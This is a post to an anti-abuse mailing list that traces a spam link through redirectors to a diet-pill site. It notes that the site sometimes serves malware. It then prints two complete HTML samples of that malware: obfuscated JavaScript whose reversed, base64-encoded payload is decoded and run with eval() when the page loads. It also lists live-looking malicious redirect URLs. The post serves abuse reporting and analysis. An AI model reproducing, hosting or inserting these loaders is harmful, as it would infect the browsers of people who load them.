Re: [anti-abuse-wg] Malware/ransomware current live distribution IPs

In message <15749.1467320923@server1.tristatelogic.com>, I wrote:

Anyway, following the link in the above spam payload/body gets you to a trivial redirector... kindly hosted by Godaddy... which then attempts to take you to this new URL:

http://gooodweightlossgood.com/?a=388338&c=wl_con&s=33

There is another redirection once you get there.

The additional redirection takes you to: http://372-beauty.gooodweightlossgood.com/us/newd/scux/cla-safflower-oil/ Note however that the content being served up here is *only* an advert for a useless diet supplement (CLA Safflower Oil)... *not* a hunk of Javascript malware. I have yet to figure this out exactly. Some of the time, these sites serve up unambiguous (and heavily encoded) Javascript malware. (See below.) Other times, they don't. I confess that I haven't figured out the pattern yet, or even whether it is a time-dependent thing. Regards, rfg malware sample 1: ============================================================================== <!DOCTYPE html> <html> <head> <script language="javascript" type="text/javascript"> var _1Ol='==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';function _0l0(data){var OOIlOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i=0,enc='';do{h1=OOIlOI.indexOf(data.charAt(i++));h2=OOIlOI.indexOf(data.charAt(i++));h3=OOIlOI.indexOf(data.charAt(i++));h4=OOIlOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function OOI(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(_0l0(OOI(_1Ol))); </script> </head> <body> </body> </html> ============================================================================== Malware sample 2: ============================================================================== <!DOCTYPE html> <html> <head> <script language="javascript" type="text/javascript"> var I1O='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';function OlI(data){var _011lOI="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";var o1,o2,o3,h1,h2,h3,h4,bits,i =0,enc='';do{h1=_011lOI.indexOf(data.charAt(i++));h2=_011lOI.indexOf(data.charAt(i++));h3=_011lOI.indexOf(data.charAt(i++));h4=_011lOI.indexOf(data.charAt(i++));bits=h1<<18|h2<<12|h3<<6|h4;o1=bits>>16&0xff;o2=bits>>8&0xff;o3=bits&0xff;if(h3==64){enc+=String.fromCharCode(o1)}else if(h4==64){enc+=String.fromCharCode(o1,o2)}else{enc+=String.fromCharCode(o1,o2,o3)}}while(i<data.length);return enc} function _011(string){ var ret = '', i = 0; for ( i = string.length-1; i >= 0; i-- ){ ret += string.charAt(i);} return ret; }eval(OlI(_011(I1O))); </script> </head> <body> </body> </html> ==============================================================================